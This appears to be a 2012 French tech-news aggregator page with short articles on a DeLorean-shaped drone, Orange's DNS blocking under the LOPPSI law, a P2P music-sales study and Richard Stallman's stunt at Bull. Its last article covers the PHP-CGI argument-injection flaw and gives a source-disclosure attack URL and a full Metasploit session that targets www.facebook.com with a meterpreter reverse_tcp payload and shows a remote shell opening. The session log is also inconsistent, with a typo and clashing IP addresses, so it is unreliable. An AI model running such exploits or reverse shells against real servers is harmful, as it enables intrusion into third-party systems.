Une Delorean qui vole sans traverser le temps
Vu 22 fois
Alors que les passionnés de drones télécommandés ne jurent plus que par l’AR. Drone deuxième du nom, un modèle inspiré de la Deloreanfait le buzz sur la toile.
Tout comme celui de Parrot, le drone en question se trouve être un quadricoptère. L’objet volant possède un corps qui copie la forme de la voiture d’Emmett « Doc » Brown dans la trilogie Retour vers le futur. Le drone est assez fidèle à l’original dans les détails. Par ailleurs,il se diffère de la voiture du film par la présence de quatre hélices en lieu et place des roues. Cela permet à l’engin de planer dans les airs de manière plutôt intelligente. En effet, il est équipé d’un capteur MultiWii qui lui permet de se stabiliser, un contrôleur de vitesse HobbyKing 12A ainsi que des moteurs Turnigy 2204-14T.
Pour donner plus de clinquant au drone, son concepteur l’a équipé d’éclairages et d’ornements LED de couleur bleu. L’engin est alimenté par une batterie lithium polymère. Aucune production en série n’a été mentionnée pour le moment.
LOPPSI : Orange programme un blocage par DNS au 1er janvier 2013
Vu 24 fois
Tableau de synthèse issu du rapport
Exclusif. Avec l’article 4, la grande loi sécuritaire de la précédente majorité présidentielle contraint les intermédiaires techniques à bloquer les sites pédopornographies. Dans un courrier que nous nous sommes procuré, la direction d’Orange donne de nouveaux éclairages internes sur ce fameux dispositif.
En juin 2008, Michele Alliot Marie, ministère de l’Intérieur, l’assurait : « l’accès aux sites à caractère pédopornographique sera bloqué en France. D’autres démocraties l’ont fait. La France ne devait plus attendre ». Trois ans plus tard, la LOPPSI est votée après un marathon parlementaire. Sur la question du blocage, nombreuses voix se sont élevées pour dénoncer l’inefficacité de la mesure, rapport à l’appui. En vain. Conformément au texte, le fameux article 4 est entré en application un an après la publication de la loi au Journal Officiel, soit le 15 mars 2012.
Orange fait le choix du blocage par DNS
Problème, malgré l’impérieuse urgence affichée, le gouvernement précédent a négligé de publier le décret d’application. Celui-ci est pourtant censé encadrer le dispositif, avec notamment la question de la compensation des frais des intermédiaires techniques. Aujourd’hui, c’est donc le flou complet tant pour la mise en œuvre technique du blocage que pour le calendrier. Contacté en mars, le service d’information et de communication de la police nationale s’était refusé à nous fournir le moindre délai opérationnel.
L’étude d’impact de la LOPPSI, annexée à la loi, prévoit cependant que « les FAI auront le libre choix des technologies de blocage selon leurs infrastructures ». Chez Orange, le choix est désormais fait. Selon nos informations, le FAI est en train de mettre en place les structures personnelles pour activer un blocage par DNS, comme pour l’univers des sites de jeux illicites.
Un filtrage de nom de domaine d’une efficacité discutable et particulièrement « sale » puisque « avec cette technique, ce n’est pas le contenu illégal qui est filtré, mais l’intégralité du domaine internet qui l’héberge » (voir étude de C.Espern: Principe, intérêts, limites et risques du filtrage hybride à des fins de blocage de ressources pédopornographiques hébergées sur des serveurs étrangers). Si les autorités ordonne le blocage de ******.com/pédo.jpg, c’est tout ******.com qui sera bloqué.
Un système retardé au 1er janvier 2013, chez Orange
Dans un courrier que la direction vient d’adresser à son réseau interne, l’opérateur historique fournit même une nouvelle date : « La mise en application [du blocage] est reportée au 1er janvier 2013 ». Ce report lui sera utile pour adapter son système d’information : « Il faut auparavant mettre en œuvre des systèmes complexes et un travail collaboratif entre toutes les entités du groupe FT concernées » prévient de FAI qui prédit aussi « une liste quotidienne de quelques milliers de noms fournie par les autorités ».
Quelques milliers, et plus seulement 1000 sites comme l’affirmait le Figaro.
La date du 1er janvier 2013 est-elle commune à d’autres FAI ? Interrogé, la Fédération Française de Télécom vient de nous indiquer qu’elle n’a aucune information sur ce calendrier de déploiement. Côté SFR, même son de cloche avec une précision en plus : « il n’y a pas d’accord FAI et la date [de mise en œuvre] du blocage dépend également du ministère ». Free – qui n’est pas membre de la FFT – se contente du minimum syndical : légaliste, il préfère attendre les textes avant d’envisager quoi que ce soit.
Dans un document préparatoire à la campagne, une partie du Parti Socialiste avait promis l’abrogation de la LOPPSI en juin 2011. Maintenant en responsabilité, ces multiples retards vont lui permettre de se positionner clairement sur cette loi sécuritaire, sur les deux fichiers monstre qu’elle organise, et maintenant le blocage des sites.
Le P2P contribue aux ventes de musique, selon une nouvelle étude
Vu 17 fois
effets du téléchargement illégal sur les ventes
Robert Hammond, chercheur à l’Université de Caroline du Nord, s’est intéressé aux effets du téléchargement illégal sur les ventes de musique enregistrée. Plus précisément, il a analysé l’impact de la mise à disposition d’albums avant leur sortie officielle. Pour ce faire, l’universitaire a étudié un panel composé de plus de 1 000 albums, diffusés grâce à des logiciels de partage basés sur le protocole BitTorrent.
Effets bénéfiques sur les ventes d’albums
Contrairement à ce qu’ont souvent pu affirmer les associations d’ayants droit, l’étude (disponible en PDF) publiée le 7 mai dernier relève qu’il n’y a « aucune preuve d’un effet négatif » du P2P sur les ventes de musique. Les résultats d’Hammond suggèrent même que le piratage permet d’augmenter le nombre d’albums vendus. Selon nos confrères de TorrentFreak, les observations d’Hammond vont permettre de donner de nouvelles ressources au débat sur les effets du téléchargement illégal.
D’après les conclusions de l’étude, « un album mis à disposition sur le réseau un mois avant sa sortie vendrait 60 unités supplémentaires ». Un chiffre qui peut sembler ridicule, mais qui est en réalité lourd de sens. Il signifie notamment que contrairement à ce que certains ont pu affirmer, le partage de musique a un effet bénéfique sur les ventes d’albums.
Il n’en demeure pas moins que cette tendance générale dissimule dans la pratique des disparités entre les artistes. En effet, l’auteur remarque que ce bénéfice profite avant tout aux « artistes populaires » appartenant à la culture « mainstream ». En revanche, les effets seraient moindres pour les artistes « nouveaux et plus petits ». Autrement dit, plus un artiste a du succès, plus il a de chances de voir sa musique téléchargée illégalement puis achetée.
Un nouvel élément relatif au débat sur les effets du piratage
Quand Richard Stallman pratique un exorcisme sur Bull & Amesys
Vu 66 fois
Le grand Richard Stallman était de passage en Tunisie pour participer à un hackerspace, quand après une after autour d’un bon barbecue à Sidi Bou Said, il a décidé avec d’autres de « pirater » physiquement les locaux de Bull en Tunisie et de poser quelques questions sur le rôle de l’entreprise dans l’espionnage des citoyens Tunisiens, mais aussi Marocains ou Français par sa filiale Amesys.
Un petit ‘happening’ LULZ imaginé autour d’un barbecue dans les hauteurs de Sidi Bou Said – au sein d’un hackerspace – et exécuté le lendemain, au siège social de Bull, à Tunis, où Stallman incarnait Saint IGNUcius de l’église des Emacs.
Bull est l’un des plus gros marchands d’armes numériques de la planète, fournisseur de solutions de surveillance globale, capables de mettre sur écoute un pays tout entier. L’entreprise, dont l’Etat Français possède une large part du capital, s’est fait connaitre des amateurs de politique en apparaissant dans l’affaire Takkiedine sous la marque Amesys, dans un contrat de vente d’armes avec le colonel Kadhafi. Elle fournit également des pays comme le Qatar, le Gabon, le Maroc ou la France, mais pas que.
Mais Bull reste très discret, et beaucoup trop technique, pour que les journalistes ne comprennent quoi que ce soit à ces technologies de pointe, installées un peu partout en Afrique et au Moyen-Orient… et en France. Discrets également : les politiques. En Tunisie, au Maroc, en France, et ailleurs : personne quand il s’agit de s’expliquer sur la présence de telles installations sur leur territoire. Sur les usages qu’ils comptent en faire à l’encontre de leurs populations. Sur ce que l’ont peut entendre par respect des Droits de l’Homme en ligne. Sur le modèle de société numérique qu’ils comptent imposer à l’aide de ces armes à leurs citoyens.
Une façon originale et décalée de faire le buzz pour attirer l’attention sur la surveillance généralisée des états avec bien sûr la complicité de la France et de la société Bull.
Bien joué les gars 
La faille Php/Cgi touche aussi facebook.com
Vu 237 foisUne faille de sécurité assez grave vient d’être découverte dans les versions 5.3 et 5.4 de PHP. L’utilisation d’une simple requête HTTPpermet d’afficher le code source de la page et éventuellement d’y retrouver les mots de passes utilisés. De quoi avoir quelques frissons dans le dos.
1. La faille et les solutions pour la contrer
Pour pouvoir exploiter cette faille, il faut tout de même répondre aux conditions suivantes :
- Utiliser une version de PHP sur le serveur inférieure à la 5.3.12 ou la 5.4.2
- L’interpréteur PHP doit fonctionner en mode CGI, ce qui n’est pas le mode par défaut
- La requête HTTP doit être du type Query String, commencer par le signe – et ne pas comporter de signe =
- La méthode de la requête doit être soit un GET, soit un HEAD
- Les modules FastCGI, mod_suphp, ainsi que le couple nginx + php-fpm ne sont pas concernés
Si vous ne savez pas dans quel mode est configuré votre serveur Apache, sachez qu’une configuration en mode CGI ressemble à quelque chose comme ça :
1 2 | Options +ExecCGI AddHandler php5-cgi .php |
Voici un exemple de requête qui permet de lancer une attaque. Ici, on utilise le paramètre -s qui permet de forcer l’affichage du code source :
1 | http://victime.fr/index.php?-s |
Pour corriger cette faille, il existe aujourd’hui deux méthodes. La première consiste tout simplement à mettre à jour PHP. La seconde est la mise en place de règles pour mod_rewrite qui permettent de filtrer les requêtes malicieuses. Voici un exemple de configuration à utiliser :
1 2 | RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC] RewriteRule ^(.*) $1? [L] |
2. Le module pour Metasploit
Un module pour Metasploit est déjà disponible et il se nomme « php_cgi_arg_injection ». Celui-ci utilise le paramètre -d qui permet de modifier le comportement d’une page PHP dynamiquement, pour ouvrir un shell à distance. Voici un exemple d’utilisation :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | # cd metasploit && svn up # ./msfconsole -n msf > use exploit/unix/webapp/php_cgi_arg_injection msf > info msf > set RHOST www.facebook.com msf > set RPORT 80 msf > set TARGETURI / msf > show payloads msf > set PAYLAOD php/meterpreter/reverse_tcp msf > set LHOST 192.168.1.101 msf > set LPORT 4444 msf > exploit [*] Started reverse handler on 129.20.129.167:4444 "/?-d+allow_url_include%3dtrue+-d+auto_prepend_file%3dphp://input" [*] Sending stage (38791 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.101:443 -> 192.168.1.100:57139) at 2012-05-03 18:42:39 -0400 meterpreter > getuid Server username: www-data (33) |
Source: www.tux-planet.fr